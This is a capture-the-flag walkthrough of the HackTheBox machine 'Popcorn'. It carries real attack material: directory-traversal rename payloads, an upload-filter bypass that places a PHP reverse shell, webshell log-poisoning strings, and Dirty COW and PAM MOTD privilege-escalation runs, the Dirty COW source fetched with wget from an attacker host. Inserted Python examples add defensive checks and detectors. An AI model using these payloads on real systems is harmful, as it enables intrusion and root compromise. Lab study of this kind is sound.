
HackTheBox - Popcorn

Overview

This machine begins with web enumeration, which discovers a .php page that allows users to rename files. It lacks input sanitization, so users can rename any file on the system by using directory traversal (../), similar to LFI.

There is also a web application (torrenthost) that allows users to upload and host torrent files. It is not possible to bypass the torrent upload restriction; however, another function of the application lets users add a screenshot for a torrent, and that upload check can be bypassed to upload .php files.

With the help of the rename page, we can find where our uploaded reverse shell is stored, rename it to .php and move it into the web root directory, giving us a shell as the low-privilege www-data user.

For privilege escalation, the system is susceptible to the dirtyc0w kernel exploit; simply running the exploit roots the machine. The machine is also susceptible to a local privilege escalation exploit because of an outdated version of PAM (pam_motd); again, simply running the exploit roots the machine.


Column        Details
Box Name      Popcorn
IP            10.10.10.6
Points        30
Difficulty    Medium
Creator       ch4p
Release Date  15 Mar 2017

Recon

TCP/80 (HTTP)

  • FFUF

      cgi-bin/                [Status: 403, Size: 287, Words: 21, Lines: 11]
      index                   [Status: 200, Size: 177, Words: 22, Lines: 5]
      index.html              [Status: 200, Size: 177, Words: 22, Lines: 5]
      test                    [Status: 200, Size: 47137, Words: 2474, Lines: 651]
      torrent                 [Status: 301, Size: 312, Words: 20, Lines: 10]
      rename                  [Status: 301, Size: 309, Words: 20, Lines: 10]

    • rename
    • torrent

Initial Foothold

TCP/80 (HTTP) - What is rename/index.php doing?

  1. Browse to rename/index.php; it is a page that allows users to rename a specified file.
    • It could be vulnerable to directory traversal (../), allowing us to move a potentially sensitive file into the web directory so we can view it.
  2. Rename rename/index.php -> rename/rename.php as a test

     # Payload
     filename=/var/www/html/index.php&newfilename=/var/www/html/rename.php


    • If the file does not exist, PHP will disclose the full path of the PHP script that was executed.
    • Web Root Directory:
      • /var/www/
  3. Attempt directory traversal (../) to rename rename/index.php, to see whether any input sanitization mechanisms are in place.

     # Payload
     filename=../../../../../../../../var/www/rename/index.php&newfilename=../../../../../../../../var/www/rename/rename.php


    • Directory traversal works!
  4. Attempt to view users on the machine by renaming /etc/passwd into the web directory.

     # Payload
     filename=../../../../../../../../etc/passwd&newfilename=../../../../../../../../var/www/passwd


    • Permission denied
  5. To proceed, we have a few options
    1. LFI2RCE
    2. Upload a webshell via torrenthost and move it to a location where we can execute it (/var/www/shell.php)
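The rename page above trusts both parameters, which is why the traversal payloads work. As an added example that is not the machine's code, here is the kind of path-confinement check such a handler needs: each user-supplied path is normalised under a fixed base directory and rejected if it escapes, which stops both the `../` chains and the absolute-path payloads used in this section. `RENAME_ROOT` is an assumed value; the real handler's configuration is not shown on the page.

```python
import os
import posixpath
import tempfile
from typing import Optional

# Directory the rename feature is supposed to operate on. Assumed value for
# this example; the page never shows the real handler's configuration.
RENAME_ROOT = "/var/www/rename/files"


def confine(base: str, user_path: str) -> Optional[str]:
    """Lexically resolve user_path under base; return None if it escapes."""
    base = posixpath.normpath(base)
    if "\x00" in user_path or posixpath.isabs(user_path):
        return None  # null bytes and '/etc/passwd'-style absolute paths
    # normpath() collapses every '../' before the containment test, so the
    # number of traversal steps in the payload does not matter.
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    if candidate == base or posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


def safe_rename(base: str, filename: str, newfilename: str) -> bool:
    """Rename only when source and destination both stay inside base."""
    src, dst = confine(base, filename), confine(base, newfilename)
    if src is None or dst is None:
        return False
    # realpath() re-checks after symlink resolution: the lexical check alone
    # would accept a symlink inside base that points outside it.
    real_base = os.path.realpath(base)
    for p in (os.path.realpath(src), os.path.realpath(os.path.dirname(dst))):
        if os.path.commonpath([real_base, p]) != real_base:
            return False
    os.rename(src, dst)
    return True


def demo() -> dict:
    """Replay this section's payload shapes against a throwaway directory."""
    with tempfile.TemporaryDirectory() as base:
        with open(os.path.join(base, "index.php"), "w") as f:
            f.write("<?php ?>")  # constructed stand-in for the rename script
        return {
            "in_dir": safe_rename(base, "index.php", "rename.php"),
            "traversal": safe_rename(base, "../" * 8 + "etc/passwd", "passwd"),
            "absolute": safe_rename(base, "/etc/passwd", "passwd"),
            "renamed": os.path.exists(os.path.join(base, "rename.php")),
        }
```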

TCP/80 (HTTP) - LFI2RCE (Failed)

  1. Include apache log file
    1. Validate the location of apache log files

       # Payload
       filename=../../../../../../../../var/log/apache2/access.log&newfilename=../../../../../../../../var/log/apache2/access.log


      • Permission denied
  2. Include /proc/self/environ
    1. Validate the location of /proc/self/environ, it exists

       # Payload
       filename=../../../../../../../../proc/self/environ&newfilename=../../../../../../../../proc/self/environ


    2. Poison /proc/self/environ and attempt to move it to /var/www/; failed

       # Payload
       filename=../../../../../../../../proc/self/environ&newfilename=../../../../../../../../var/www/environ

       # User Agent
       <?php system(\$_GET['c']); ?>


      • failed to open stream
  3. Include SSH log files
    1. Validate the location of /var/log/auth.log, it exists

       filename=../../../../../../../../var/log/auth.log&newfilename=../../../../../../../../var/log/auth.log


    2. Poison SSH Log

       ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/exploit/test]
       └─# ssh '<?php echo system($_GET["c"]); exit; ?>'@popcorn.htb
       <?php echo system($_GET["c"]); exit; ?>@popcorn.htb's password:

    3. Attempt to move it to /var/www/; failed

       filename=../../../../../../../../var/log/auth.log&newfilename=../../../../../../../../var/www/auth.php


TCP/80 (HTTP) - Upload webshell.torrent on Torrent Host

  1. Register an account on torrenthost
  2. After some testing,
    1. torrenthost appears to detect when a file already in its database is uploaded again by analysing the uploaded file's contents (I think), so changing the filename does not bypass it.
    2. Changing the content of the torrent file, even by a single character, causes it to be rejected as not a torrent file, so inserting a webshell into a torrent file's contents with Burp will not work.
  3. Create our own webshell torrent file to upload
    1. Create webshell.torrent

       ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/loot]
       └─# cat webshell.php
       <?php system($_GET['c']); ?>

       ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/loot]
       └─# transmission-create webshell.php -o webshell.torrent
       WARNING: no trackers specified
       Creating torrent "webshell.torrent" .... done!

    2. Add a webshell into the Optional Name field
    3. Upload it, success!
  4. Next, we have to find out where webshell.torrent is stored.
  5. Simply rename popcorn.htb/torrent/index.php to popcorn.htb/torrent/index so that the directory listing of popcorn.htb/torrent becomes visible; this lets us browse the entire /torrent directory to find where webshell.torrent is stored.

     # Payload
     filename=../../../../../../../../var/www/torrent/index.php&newfilename=../../../../../../../../var/www/torrent/index

    • torrents/ - webshell.torrent could be residing in it
  6. Do what we did earlier, rename popcorn.htb/torrent/torrents/index.php to view the directory listing of popcorn.htb/torrent/torrents/
  7. Found our webshell.torrent
  8. Move it to /var/www/

     # Payload
     filename=../../../../../../../../var/www/torrent/torrents/0a6d9ecd5140c68d05343c711de65ab7f23cf81e.btf&newfilename=../../../../../../../../var/www/webshell.php


  9. Unfortunately, webshell.torrent did not contain any PHP code or our webshell.

TCP/80 (HTTP) - File Upload Bypass on Torrent Host

  1. After skimming through torrenthost, there is a function that allows users to insert an image to display on their torrent.

     # Browse -> Select Webshell.php -> Edit This Torrent


  2. After some testing,
    • .jpg, .png files are allowed
    • .php, Invalid File
  3. How do we bypass the file upload restriction?
    1. Change the file extension .php -> .png
    2. Change Content-Type
    3. Add a Magic Header GIF89a
  4. Upload php-reverse-shell.php and bypass the restriction

     # Payload
     ------WebKitFormBoundary2SsVFwbzBBilUqZy
     Content-Disposition: form-data; name="file"; filename="php-reverse-shell.png"
     Content-Type: image/png


  5. Next, we have to find out where php-reverse-shell.png is stored
  6. It resides in upload/
    • Notice the Last modified date.
  7. Move it to /var/www w/ rename/index.php
  8. Start listener

     ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/exploit]
     └─# nc -nvlp 4444
     Ncat: Version 7.92 ( https://nmap.org/ncat )
     Ncat: Listening on :::4444
     Ncat: Listening on 0.0.0.0:4444

  9. Invoke reverse shell at /var/www/shell.php

     ┌──(root💀kali)-[~/htb/popcorn]
     └─# curl http://popcorn.htb/shell.php


  10. Demo - Bypass restriction to upload webshell
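The upload check above was satisfied by a .png extension, an image/png Content-Type and a GIF89a prefix, none of which proves the bytes are an image. As an added example that is not torrenthost's code, this Python validator requires the extension, the declared type and the leading magic bytes to agree, parses the PNG IHDR chunk and its CRC, and rejects the bypass shape used in this section; the sample PNG and the fake upload are constructed inline.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Extension -> (declared Content-Type, leading magic bytes) that must all agree.
ALLOWED = {
    ".png": ("image/png", PNG_SIG),
    ".jpg": ("image/jpeg", b"\xff\xd8\xff"),
    ".jpeg": ("image/jpeg", b"\xff\xd8\xff"),
}


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Build one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def png_header_ok(data: bytes) -> bool:
    """Require the 8-byte signature and a well-formed IHDR chunk with a valid CRC."""
    if not data.startswith(PNG_SIG) or len(data) < 33:
        return False
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        return False
    return zlib.crc32(data[12:29]) & 0xFFFFFFFF == struct.unpack(">I", data[29:33])[0]


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (accepted, reason); extension, declared type and bytes must agree."""
    ext = "." + filename.rsplit(".", 1)[1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        return False, "extension not allowed"
    expected_type, magic = ALLOWED[ext]
    if content_type != expected_type:
        return False, "content-type does not match extension"
    if not data.startswith(magic):  # catches 'GIF89a' bytes behind a .png name
        return False, "magic bytes do not match extension"
    if ext == ".png" and not png_header_ok(data):
        return False, "png header malformed"
    # Defence in depth only: the real control is storing uploads where the
    # web server never executes them; re-encoding the image strips payloads.
    if b"<?php" in data.lower() or b"<?=" in data:
        return False, "php tag inside image"
    return True, "ok"


# Constructed samples: a minimal 1x1 PNG header and the bypass shape from this section.
GOOD_PNG = PNG_SIG + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
FAKE_PNG = b"GIF89a<?php system($_GET['c']); ?>"
```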

Privilege Escalation - 1

Root - MOTD

  1. Found something interesting in george's home directory

     www-data@popcorn:/home/george$ find .
     .
     ./.bash_logout
     ./.bashrc
     ./torrenthoster.zip
     ./.cache
     ./.cache/motd.legal-displayed
     ./.sudo_as_admin_successful
     ./user.txt
     ./.nano_history
     ./.mysql_history
     ./.bash_history
     ./.profile

    • motd.legal-displayed
  2. What is motd.legal-displayed?
    • MOTD is the abbreviation of "Message Of The Day"; it is used to display a message when a remote user logs in to the Linux operating system over SSH.
  3. Search exploits for motd

     Exploit Title                                                                        Path
     Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)   linux/local/14273.sh
     Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)   linux/local/14339.sh
  4. How does the pam_motd exploit work?
    • pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04 LTS
    • Allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user’s home directory, related to “user file stamps” and the motd.legal-notice file.
  5. Check pam version

     www-data@popcorn:/home/george$ dpkg -l | grep pam
     ii  libpam-modules                      1.1.0-2ubuntu1                    Pluggable Authentication Modules for PAM
     ii  libpam-runtime                      1.1.0-2ubuntu1                    Runtime support for the PAM library
     ii  libpam0g                            1.1.0-2ubuntu1                    Pluggable Authentication Modules library

    • 1.1.0
  6. Try linux/local/14339.sh
    1. Transfer 14339.sh to popcorn.htb
    2. Change permissions

       www-data@popcorn:/tmp$ chmod +x 14339.sh

    3. Exploit!

       www-data@popcorn:/tmp$ bash 14339.sh
       [*] Ubuntu PAM MOTD local root
       [*] Backuped /var/www/.ssh/authorized_keys
       [*] SSH key set up
       [*] Backuped /var/www/.cache
       [*] spawn ssh
       [+] owned: /etc/passwd
       [*] spawn ssh
       [+] owned: /etc/shadow
       [*] Restored /var/www/.cache
       [*] Restored /var/www/.ssh/authorized_keys
       [*] SSH key removed
       [+] Success! Use password toor to get root
       Password:
       root@popcorn:/tmp# id;whoami
       uid=0(root) gid=0(root) groups=0(root)
       root
       root@popcorn:/tmp#


Privilege Escalation - 2

Root - Kernel Exploit (Dirty c0w)

  1. Identify kernel version

     www-data@popcorn:/home/george$ uname -a
     Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
     www-data@popcorn:/home/george$

    • 2.6.31 - susceptible to dirtyc0w kernel exploit
  2. Try dirtyc0w exploit
    1. Download dirty.c
    2. Transfer to popcorn.htb

       www-data@popcorn:/tmp$ wget 10.10.14.14/dirty.c
       --2022-09-18 13:26:39--  http://10.10.14.14/dirty.c

    3. Compile dirty.c

       www-data@popcorn:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
       www-data@popcorn:/tmp$ chmod +x dirty

    4. Exploit

       www-data@popcorn:/tmp$ ./dirty password
       /etc/passwd successfully backed up to /tmp/passwd.bak
       Please enter the new password: password
       Complete line:
       firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash

       mmap: b78a6000

    5. Switch to firefart (root)

       www-data@popcorn:/tmp$ su firefart
       Password:
       firefart@popcorn:/tmp# id;whoami
       uid=0(firefart) gid=0(root) groups=0(root)
       firefart
       firefart@popcorn:/tmp#

    6. OR SSH w/ firefart:password

       ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/exploit]
       └─# sshpass -p 'password' ssh firefart@popcorn.htb


Additional

LFI2RCE - Apache Log Files

  1. Earlier we tried to poison the Apache log files and failed because user www-data has insufficient permissions on them. If the permissions were changed so that www-data could read the log, the technique would have worked.

     root@popcorn:/var/log# ls -la | grep apache2
     drwxrw----  2 root      adm     4096 2022-09-18 14:55 apache2

     root@popcorn:/var/log/apache2# ls -la /var/log/apache2/access.log
     -rw-r----- 1 root adm 398300 2022-09-18 14:21 /var/log/apache2/access.log

  2. Change permissions

     root@popcorn:/var/log/apache2# chown -R www-data:www-data apache2/

     root@popcorn:/var/log# ls -la | grep apache2
     drwxrw----  2 www-data  www-data    4096 2022-09-18 15:21 apache2

  3. Poison apache logs

     ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/loot]
     └─#  curl "http://popcorn.htb/" -H "User-Agent: <?php system(\$_GET['c']); ?>"
     <html><body><h1>It works!</h1>
     <p>This is the default web page for this server.</p>
     <p>The web server software is running but no content has been added, yet.</p>
     </body></html>

  4. Move /var/log/apache2/access.log to /var/www/log.php

     # Payload
     filename=/var/log/apache2/access.log&newfilename=/var/www/log.php


  5. The same can be done for SSH Log poisoning
  6. Demo - LFI2RCE Apache log file poisoning
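Both log-poisoning variants on this page (the PHP tag in the Apache User-Agent, and the PHP tag passed as an SSH username into auth.log) leave the payload sitting in the log itself, which makes them easy to detect. As an added example that is not part of the original writeup, this Python scanner runs those detections over constructed sample lines: PHP open tags in the Referer/User-Agent fields of the combined access log, traversal sequences in the request line (the rename payloads, if they arrive via GET), and PHP tags in sshd "Invalid user" entries.

```python
import re

# Constructed log lines modelled on the poisoning attempts in this writeup; not
# captured from the machine. Apache combined format, then syslog-style auth.log.
ACCESS_LOG = """\
10.10.14.14 - - [18/Sep/2022:14:21:03 +0000] "GET / HTTP/1.1" 200 177 "-" "<?php system($_GET['c']); ?>"
10.10.14.14 - - [18/Sep/2022:14:21:09 +0000] "GET /torrent/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.14 - - [18/Sep/2022:14:22:41 +0000] "GET /rename/index.php?filename=../../../../etc/passwd&newfilename=../../../../var/www/passwd HTTP/1.1" 200 0 "-" "curl/7.85.0"
"""
AUTH_LOG = """\
Sep 18 14:30:11 popcorn sshd[2231]: Invalid user <?php echo system($_GET["c"]); exit; ?> from 10.10.14.14
Sep 18 14:31:02 popcorn sshd[2240]: Accepted password for george from 10.10.14.14 port 51234 ssh2
"""

PHP_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)
TRAVERSAL = re.compile(r"(\.\./|\.\.%2f|%2e%2e/|%2e%2e%2f)", re.IGNORECASE)
# Combined log format: the two trailing quoted fields are Referer and User-Agent.
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"')
INVALID_USER = re.compile(r"Invalid user (.*) from (\S+)")


def scan_access(lines):
    """Flag PHP tags in attacker-controlled headers and traversal in request lines."""
    findings = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        src, request, _status, referer, agent = m.groups()
        if PHP_TAG.search(agent) or PHP_TAG.search(referer):
            findings.append(("php_tag_in_header", src, request))
        if TRAVERSAL.search(request):
            findings.append(("path_traversal", src, request))
    return findings


def scan_auth(lines):
    """Flag SSH login attempts whose username carries a PHP tag (auth.log poisoning)."""
    findings = []
    for line in lines:
        m = INVALID_USER.search(line)
        if m and PHP_TAG.search(m.group(1)):
            findings.append(("php_tag_in_ssh_user", m.group(2)))
    return findings
```

A hit on either scanner is also the moment to check whether the log directory is readable by the web server account, since that is the precondition this section relies on.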
This post is licensed under CC BY 4.0 by the author.
